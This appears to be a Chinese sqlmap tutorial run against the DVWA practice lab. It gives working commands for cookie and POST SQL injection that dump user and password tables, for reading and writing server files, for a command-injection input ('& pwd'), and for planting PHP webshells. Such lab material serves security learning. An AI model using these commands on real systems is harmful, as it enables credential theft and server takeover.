注入工具使用-sqlmap
目录
利用sqlmap进行需要登录的注入
利用sqlmap进行POST注入
利用sqlmap进行文件读写
利用sqlmap辅助手工注入
利用sqlmap交互式写shell
利用sqlmap进行需要登录的注入
sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。
打开 dvwa,输入用户名:admin 密码:password,登录
选择Setup,然后点击Create/Reset Database
找到并打开SQL Injection
设置代理
地址:127.0.0.1 端口:8080 注意:端口要和burpsuite端口一致。
打开burpsuite,选择proxy,当intercept is on时表示burpsuite截断功能开启
随便提交一个数(如:1),然后点击submit
复制截取到的Cookie数据,然后关闭burp,关闭IE代理
cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie”
列出当前数据库
Cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie” --current-db
指定数据库猜表
Cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie” -D 数据库 --tables
猜字段
Cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie” -D 数据库 -T 表名 --columns
猜解字段内容
Cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie” -D 数据库 -T 表名 -C 列名 --dump
这样就得到了users表中的用户名和密码了。
利用sqlmap进行POST注入
POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下:
打开dvwa,输入用户名:admin 密码:password,登录
选择Brute Force选项,username和password随便输入,然后打开burpsuite,设置好本地代理(忘记的可看上面),进行抓包
将抓到的包保存为1.txt,并放到c盘根目录下。
列数据库,输入命令:sqlmap.py -r c:\1.txt -p username --dbs
-r表示加载一个文件,-p指定参数
选择一个数据库,比如选mysql,
猜表,输入命令:sqlmap.py -r c:\1.txt-p username -D mysql --tables
猜列,输入命令:sqlmap.py -r c:\1.txt-p username -D mysql -T user --columns
猜数据,输入命令: sqlmap.py -r c:\1.txt -p username -D mysql -T user -C “User,Password” --dump
利用sqlmap进行文件读写
打开dvwa,输入用户名:admin 密码:password,登录
找到并打开SQL Injection,随便提交一个数,打开burpsuite抓包,然后点击submit,获取cookie
选择Command Execution,并输入:10.1.1.136 & pwd来获得一个绝对路径,
/opt/lampp/htdocs/vulnerabilities/exec
输入:sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --
cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --file-read=/opt/lampp/htdocs/php.ini
成功读取了php.ini文件,并返回了路径。
将本地C:\1.txt 写入到服务器端/opt/lampp/htdocs/vulnerabilities/exec/1.txt
输入:sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --
cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --file-write C:\1.txt --file-dest /opt/lampp/htdocs/vulnerabilities/exec/1.txt
执行结果
打开http://10.1.1.136/vulnerabilities/exec/1.txt如下图
利用sqlmap辅助手工注入
打开dvwa,输入用户名:admin 密码:password,登录
找到并打开SQL Injection,随便提交一个数,打开burpsuite抓包,然后点击submit,获取cookie
使用内置函数获取用户名,版本,数据库名等信息
得到数据库名为dvwa,接下来猜表
返回1,说明存在users表,然后开始猜列
没有返回,说明不存在username列,将username改为user,返回1
得到了列名,现在我们来猜内容
借助sqlmap选项--sql-query结合手工注入语句就得到了user表中的用户信息。
利用sqlmap交互式写shell
打开dvwa,输入用户名:admin 密码:password,登录
选择Command Execution,并输入:10.1.1.136 & pwd来获得一个绝对路径
/opt/lampp/htdocs/vulnerabilities/exec
选择SQL Injection,输入一个数,使用burpsuite进行抓包,获取cookie
判断用户是否为dba,输入命令
接下来使用sqlmap进行交互式写shell
脚本类型为PHP,所以输入4
选择2,输入第二步得到的路径
成功写入2个shell,一个用来执行命令的,另一个是用来上传的,打开链接:http://10.1.1.136/vulnerabilities/exec/tmpugbxb.php
接下来就是上传木马了。或者直接执行linux命令
注入工具使用-sqlmap相关推荐
- Sqli-labs全通关教程(手工注入+工具使用sqlmap)
提示:手工注入就不写了,发现有很多了,质量也还可以,今天就写个sqlmap通关教程吧 文章目录 前言 一.sqli-labs1-10(get型) 二.sqli-labs 11-16(post型基础注入 ...
- 详解强大的SQL注入工具——SQLMAP
本文转自:详解强大的SQL注入工具--SQLMAP 前言 Windows下的注入工具好的又贵,免费的啊D.明小子等又不好用,我们根本没必要花 时间去找什么破解的havij.pangolin什么的,特别 ...
- SQLMAP数据库注入工具下载安装
介绍 Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描.发现并利用给定的 Url 的 Sql 注入漏洞,目前支持 MySQL. Oracle. PostgreSQL. Microsof ...
- 自动化注入工具SQLmap入侵数据库的使用方法(注入攻击)
sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入. 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是 ...
- SQL注入(使用sqli-labs案例以及sqlmap自动化注入工具)
SQL注入: sqli-labs: 一个实验平台,里面有完整的SQL注入课程,需要phpstudy环境,因此先安装phpstudy环境 phpstudy: https://www.xp.cn/ 安装后 ...
- SQL 注入工具集合
众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术.同时SQL注入攻击所带来的安全破坏也是不可弥补的.以下罗列的10款SQL注入工具可帮助管理员及时检测存在的漏洞. BSQL Hacker B ...
- mysql sql注入工具_基础篇——SQL注入(工具注入)
注入工具 上一篇介绍了SQL注入漏洞以及一些手工注入方法,本篇介绍一下注入工具 1.sqlmap sqlmap属于比较经典的一个注入工具,功能强大,还自带一些绕过参数 使用方法: sqlmap.py ...
- 渗透测试工具篇——sqlmap
目录 简介 基本使用 全部参数说明 简单使用 注入流程 sqlmap使用技巧 修改最大线程数 sqlmap速度优化 指定位置注入 检测waf 执行操作系统命令(--os-shell/--os-cmd) ...
- SQL注入测试神器sqlmap
点击上方蓝字"开源优测"一起玩耍 声明 本公众号所有内容,均属微信公众号: 开源优测 所有,任何媒体.网站或个人未经授权不得转载.链接.转贴或以其他方式复制发布/发表.已经本公众 ...
- [工具使用]SqlMap
[工具使用]SqlMap SqlMap 常用指令 探测目标网站是否存在注入 查询数据库users 查询数据库passwords 查询数据库当前用户 查询当前数据库用户是否是管理员权限 列出数据库的管理 ...
最新文章
- 计算机视觉编程——OpenCV
- 详解Spring Boot 2.X使用缓存@Cacheable代码示例
- 更深的编码器+更浅的解码器=更快的自回归模型
- SpringMvc的服务器端跳转和客户端跳转
- 为什么有了MAC层还要走IP层呢?
- 时间模块,带Python示例
- C++查缺补漏,赶紧的
- Java Vistor 设计模式
- net helpmsg get error message for error id in cmd script
- scvmm管理hyper-v克隆主机(二)
- 计算机的桌面助手,正规的电脑桌面一键整理助手
- aria2使用rpc下载百度云
- 【codejam_Round1B_C】Mousetrap
- 永远的java_永远的冒险岛-经典版
- sparksql-分组月度环比同比自动化
- 三星电子在中国正式召开三星Galaxy Note20系列新品体验发布会~~~~
- RHCE 第五次作业
- Android JNI开发入门与实战
- 1.单例模式之饿汉式
- 苹果手机怎么在照片上添加文字_给微信拍照的照片添加文字,调整后期效果,手机两步搞定!...